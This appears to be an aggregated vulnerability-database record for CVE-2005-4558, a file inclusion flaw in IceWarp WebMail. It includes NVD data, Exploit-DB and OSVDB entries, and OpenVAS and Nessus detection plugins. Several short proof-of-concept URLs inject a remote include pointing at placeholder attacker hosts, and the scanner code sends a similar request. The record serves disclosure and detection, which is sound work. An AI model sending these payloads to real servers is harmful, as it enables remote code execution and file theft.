ID CVE-2005-4558 Type cve Reporter NVD Modified 2017-07-19T21:29:18
Description
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
{"id": "CVE-2005-4558", "bulletinFamily": "NVD", "title": "CVE-2005-4558", "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "published": "2005-12-28T06:03:00", "modified": "2017-07-19T21:29:18", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/16069", "http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded", "http://securitytracker.com/id?1015412", "https://exchange.xforce.ibmcloud.com/vulnerabilities/23904", "http://marc.info/?l=full-disclosure&m=113570229524828&w=2"], "cvelist": ["CVE-2005-4558"], "type": "cve", "lastseen": "2017-07-20T10:48:59", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "cvelist": ["CVE-2005-4558"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "edition": 2, "enchantments": {}, "hash": "2b56aa45a3045cf108b835b4824c06d83abfa21ac3d78ac8d48403cf3dc910fc", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "524d402ab5981cafd25a2cb71b6fd0f1", "key": "modified"}, {"hash": "a35d8495986cceb5eef36d5c66a78c02", "key": "cpe"}, {"hash": "45393995c7975feeef903ec9bc61c0c7", "key": "title"}, {"hash": "028daec84724be9a5101b0ea56cf3762", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fd12c73fb3e40003139d7c0288f1e56e", "key": "references"}, {"hash": "a865e895a225442672cab2c70aff5573", "key": "cvelist"}, {"hash": "7a295911aadc67471369f116cafd1277", "key": "href"}, {"hash": "703e0b2717a66eca1d1ae76405ec97cd", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "id": "CVE-2005-4558", "lastseen": "2017-04-18T15:51:41", "modified": "2016-10-17T23:38:25", "objectVersion": "1.2", "published": "2005-12-28T06:03:00", "references": ["http://www.securityfocus.com/bid/16069", "http://xforce.iss.net/xforce/xfdb/23904", "http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded", "http://securitytracker.com/id?1015412", "http://marc.info/?l=full-disclosure&m=113570229524828&w=2"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-4558", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:51:41"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "cvelist": ["CVE-2005-4558"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "edition": 1, "hash": "b94f69a11608abfbec3683960bdf0b3826fcda1d803903d5d6b54324897c0538", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a35d8495986cceb5eef36d5c66a78c02", "key": "cpe"}, {"hash": "45393995c7975feeef903ec9bc61c0c7", "key": "title"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "028daec84724be9a5101b0ea56cf3762", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "38efea00311c193e8f76d5a2f51684ee", "key": "modified"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "737828fbfa76bc50c8a482845fdd6704", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a865e895a225442672cab2c70aff5573", "key": "cvelist"}, {"hash": "7a295911aadc67471369f116cafd1277", "key": "href"}, {"hash": "703e0b2717a66eca1d1ae76405ec97cd", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "id": "CVE-2005-4558", "lastseen": "2016-09-03T06:13:14", "modified": "2008-09-05T16:57:11", "objectVersion": "1.2", "published": "2005-12-28T06:03:00", "references": ["http://www.securityfocus.com/bid/16069", "http://xforce.iss.net/xforce/xfdb/23904", "http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded", "http://securitytracker.com/id?1015412", "http://marc.theaimsgroup.com/?l=full-disclosure&m=113570229524828&w=2"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-4558", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T06:13:14"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a35d8495986cceb5eef36d5c66a78c02"}, {"key": "cvelist", "hash": "a865e895a225442672cab2c70aff5573"}, {"key": "cvss", "hash": "9acfc3ecd06539a3534549fd05dfad8e"}, {"key": "description", "hash": "703e0b2717a66eca1d1ae76405ec97cd"}, {"key": "href", "hash": "7a295911aadc67471369f116cafd1277"}, {"key": "modified", "hash": "f231d0748ed9a30a0db96dc038bebd15"}, {"key": "published", "hash": "028daec84724be9a5101b0ea56cf3762"}, {"key": "references", "hash": "95b426f026069964f5d5209d9bf891bc"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "45393995c7975feeef903ec9bc61c0c7"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "230e311ca8df6c29733c7e512b43f825c7a065e25e207a315e403e6ca170429f", "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-20T10:48:59"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-03T04:50:46", "osvdbidlist": ["22080"], "references": [], "description": "IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusiona. CVE-2005-4558 . Webapps exploit for php platform", "edition": 1, "reporter": "Tan Chew Keong", "published": "2005-12-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4558"], "modified": "2005-12-27T00:00:00", "id": "EDB-ID:26982", "href": "https://www.exploit-db.com/exploits/26982/", "sourceData": "source: http://www.securityfocus.com/bid/16069/info\r\n \r\nIceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.\r\n \r\nAn attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.\r\n \r\nAdditionally, an attacker can exploit these issues to obtain the contents of local files.\r\n \r\nMerak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.\r\n \r\nUPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.\r\n\r\n\r\nhttp://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST ", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26982/"}, {"lastseen": "2016-02-03T04:50:54", "osvdbidlist": ["22081"], "references": [], "description": "IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion. CVE-2005-4558. Webapps exploit for php platform", "edition": 1, "reporter": "Tan Chew Keong", "published": "2005-12-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4558"], "modified": "2005-12-27T00:00:00", "id": "EDB-ID:26983", "href": "https://www.exploit-db.com/exploits/26983/", "sourceData": "source: http://www.securityfocus.com/bid/16069/info\r\n \r\nIceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.\r\n \r\nAn attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.\r\n \r\nAdditionally, an attacker can exploit these issues to obtain the contents of local files.\r\n \r\nMerak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.\r\n \r\nUPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.\r\n\r\n\r\nhttp://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/; ", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26983/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "references": [], "edition": 1, "description": "## Vulnerability Description\nVisNetic Mail Server Webmail contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /mail/index.html not properly sanitizing user input supplied to the \"lang_settings\" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nUpgrade to version 8.3.5.r (Merak Mail Server), 8.3.5 (Visnetic WebMail), or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nVisNetic Mail Server Webmail contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /mail/index.html not properly sanitizing user input supplied to the \"lang_settings\" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[attacker]/;\n## References:\nVendor URL: http://www.deerfield.com/download/visnetic-mailserver/\n[Secunia Advisory ID:17865](https://secuniaresearch.flexerasoftware.com/advisories/17865/)\n[Related OSVDB ID: 22079](https://vulners.com/osvdb/OSVDB:22079)\n[Related OSVDB ID: 22082](https://vulners.com/osvdb/OSVDB:22082)\n[Related OSVDB ID: 22077](https://vulners.com/osvdb/OSVDB:22077)\n[Related OSVDB ID: 22078](https://vulners.com/osvdb/OSVDB:22078)\n[Related OSVDB ID: 22080](https://vulners.com/osvdb/OSVDB:22080)\nOther Advisory URL: http://secunia.com/secunia_research/2005-62/advisory/\n[Nessus Plugin ID:20346](https://vulners.com/search?query=pluginID:20346)\n[CVE-2005-4558](https://vulners.com/cve/CVE-2005-4558)\nBugtraq ID: 16069\n", "reporter": "Secunia Security Advisories(sec-adv@secunia.com)", "published": "2005-12-27T10:03:16", "type": "osvdb", "title": "IceWarp WebMail /mail/index.html lang_settings Variable Remote File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Merak Mail Server", "version": "8.3.0.r", "operator": "eq"}, {"name": "Visnetic WebMail", "version": "8.3.0 build 1", "operator": "eq"}], "cvelist": ["CVE-2005-4558"], "modified": "2005-12-27T10:03:16", "href": "https://vulners.com/osvdb/OSVDB:22081", "id": "OSVDB:22081", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:19", "references": [], "edition": 1, "description": "## Vulnerability Description\nVisNetic Mail Server Webmail contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when improper information is assigned to the \"language\" variable when calling the /mail/settings.html script, which will display arbitrary files on the server's filesystem resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to version 8.3.5.r (Merak Mail Server), 8.3.5 (Visnetic WebMail), or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nVisNetic Mail Server Webmail contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when improper information is assigned to the \"language\" variable when calling the /mail/settings.html script, which will display arbitrary files on the server's filesystem resulting in a loss of confidentiality.\n## Manual Testing Notes\nhttp://[target]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST\n## References:\nVendor URL: http://www.deerfield.com/download/visnetic-mailserver/\n[Secunia Advisory ID:17865](https://secuniaresearch.flexerasoftware.com/advisories/17865/)\n[Related OSVDB ID: 22079](https://vulners.com/osvdb/OSVDB:22079)\n[Related OSVDB ID: 22082](https://vulners.com/osvdb/OSVDB:22082)\n[Related OSVDB ID: 22077](https://vulners.com/osvdb/OSVDB:22077)\n[Related OSVDB ID: 22078](https://vulners.com/osvdb/OSVDB:22078)\n[Related OSVDB ID: 22081](https://vulners.com/osvdb/OSVDB:22081)\nOther Advisory URL: http://secunia.com/secunia_research/2005-62/advisory/\n[Nessus Plugin ID:20346](https://vulners.com/search?query=pluginID:20346)\n[CVE-2005-4558](https://vulners.com/cve/CVE-2005-4558)\nBugtraq ID: 16069\n", "reporter": "Secunia Security Advisories(sec-adv@secunia.com)", "published": "2005-12-27T10:03:16", "type": "osvdb", "title": "IceWarp WebMail /mail/settings.html Language Variable Local File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Merak Mail Server", "version": "8.3.0.r", "operator": "eq"}, {"name": "Visnetic WebMail", "version": "8.3.0 build 1", "operator": "eq"}], "cvelist": ["CVE-2005-4558"], "modified": "2005-12-27T10:03:16", "href": "https://vulners.com/osvdb/OSVDB:22080", "id": "OSVDB:22080", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:35:54", "references": ["http://www.deerfield.com/download/visnetic-mailserver/", "http://secunia.com/secunia_research/2005-62/advisory/"], "pluginID": "136141256231020346", "description": "The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.", "edition": 3, "reporter": "This script is Copyright (C) 2005 David Maciejak", "published": "2006-03-26T00:00:00", "title": "VisNetic / Merak Mail Server multiple flaws", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231020346", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231020346", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: visnetic_mailserver_flaws.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: VisNetic / Merak Mail Server multiple flaws\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.\";\n\ntag_solution = \"Upgrade to Merak Mail Server 8.3.5.r / VisNetic Mail Server version\n8.3.5 or later.\";\n\n# Ref: Tan Chew Keong, Secunia Research\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.20346\");\n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2005-4556\", \"CVE-2005-4557\", \"CVE-2005-4558\", \"CVE-2005-4559\");\n script_bugtraq_id(16069);\n \n name = \"VisNetic / Merak Mail Server multiple flaws\";\n script_name(name);\n \n \n \n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2005 David Maciejak\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"http_version.nasl\");\n script_require_ports(32000, \"Services/www\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2005-62/advisory/\");\n script_xref(name : \"URL\" , value : \"http://www.deerfield.com/download/visnetic-mailserver/\");\n exit(0);\n}\n\n#\n# da code\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif ( !get_kb_item(\"Settings/disable_cgi_scanning\") )\n port = get_http_port(default:32000);\nelse\n port = 32000;\n\nif(!get_port_state(port))exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n# nb: software is accessible through either \"/mail\" (default) or \"/\".\ndirs = make_list(\"/mail\", \"\");\nforeach dir (dirs) {\n req = http_get(item:string(dir, \"/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/openvas/\"), port:port);\n r = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\n if(\"http://xxxxxxxxxxxxxxx/openvas/alang.html\" >< r)\n {\n security_message(port);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-08T11:44:05", "references": ["http://www.deerfield.com/download/visnetic-mailserver/", "http://secunia.com/secunia_research/2005-62/advisory/"], "pluginID": "20346", "description": "The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.", "edition": 2, "reporter": "This script is Copyright (C) 2005 David Maciejak", "published": "2006-03-26T00:00:00", "title": "VisNetic / Merak Mail Server multiple flaws", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=20346", "id": "OPENVAS:20346", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: visnetic_mailserver_flaws.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: VisNetic / Merak Mail Server multiple flaws\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.\";\n\ntag_solution = \"Upgrade to Merak Mail Server 8.3.5.r / VisNetic Mail Server version\n8.3.5 or later.\";\n\n# Ref: Tan Chew Keong, Secunia Research\n\nif(description)\n{\n script_id(20346);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2005-4556\", \"CVE-2005-4557\", \"CVE-2005-4558\", \"CVE-2005-4559\");\n script_bugtraq_id(16069);\n \n name = \"VisNetic / Merak Mail Server multiple flaws\";\n script_name(name);\n \n \n \n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2005 David Maciejak\");\n family = \"Web application abuses\";\n script_family(family);\n script_dependencies(\"http_version.nasl\");\n script_require_ports(32000, \"Services/www\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://secunia.com/secunia_research/2005-62/advisory/\");\n script_xref(name : \"URL\" , value : \"http://www.deerfield.com/download/visnetic-mailserver/\");\n exit(0);\n}\n\n#\n# da code\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif ( !get_kb_item(\"Settings/disable_cgi_scanning\") )\n port = get_http_port(default:32000);\nelse\n port = 32000;\n\nif(!get_port_state(port))exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n# nb: software is accessible through either \"/mail\" (default) or \"/\".\ndirs = make_list(\"/mail\", \"\");\nforeach dir (dirs) {\n req = http_get(item:string(dir, \"/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/openvas/\"), port:port);\n r = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\n if(\"http://xxxxxxxxxxxxxxx/openvas/alang.html\" >< r)\n {\n security_message(port);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:44:47", "references": ["http://www.deerfield.com/download/visnetic-mailserver/", "http://secunia.com/secunia_research/2005-62/advisory/"], "pluginID": "20346", "description": "The remote host is running VisNetic / Merak Mail Server, a multi- featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of this software are prone to multiple flaws. An attacker could send specially crafted URLs to execute arbitrary scripts, perhaps taken from third-party hosts, or to disclose the content of files on the remote system.", "edition": 4, "reporter": "Tenable", "published": "2005-12-28T00:00:00", "title": "VisNetic / Merak Mail Server Multiple Remote Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "modified": "2018-08-06T00:00:00", "cpe": [], "id": "VISNETIC_MAILSERVER_FLAWS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20346", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20346);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2005-4556\", \"CVE-2005-4557\", \"CVE-2005-4558\", \"CVE-2005-4559\");\n script_bugtraq_id(16069);\n \n script_name(english:\"VisNetic / Merak Mail Server Multiple Remote Vulnerabilities\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote webmail server is affected by multiple vulnerabilities\nthat could allow an attacker to execute arbitrary commands on the\nremote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running VisNetic / Merak Mail Server, a multi-\nfeatured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/secunia_research/2005-62/advisory/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.deerfield.com/download/visnetic-mailserver/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Merak Mail Server 8.3.5.r / VisNetic Mail Server version\n8.3.5 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/28\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/12/27\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n script_summary(english:\"Checks for VisNetic Mail Server arbitrary script include\");\n \n script_category(ACT_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CGI abuses\");\n script_dependencie(\"http_version.nasl\");\n script_require_ports(32000, \"Services/www\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# da code\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif ( !get_kb_item(\"Settings/disable_cgi_scanning\") )\n port = get_http_port(default:32000);\nelse\n port = 32000;\n\nif(!get_port_state(port))exit(0);\nif (!can_host_php(port:port)) exit(0);\n\n# nb: software is accessible through either \"/mail\" (default) or \"/\".\ndirs = make_list(\"/mail\", \"\");\nforeach dir (dirs) {\n req = http_get(item:string(dir, \"/accounts/inc/include.php?language=0&lang_settings[0][1]=http://xxxxxxxxxxxxxxx/nessus/\"), port:port);\n r = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\n if(\"http://xxxxxxxxxxxxxxx/nessus/alang.html\" >< r)\n {\n security_hole(port);\n exit(0);\n }\n}\n", 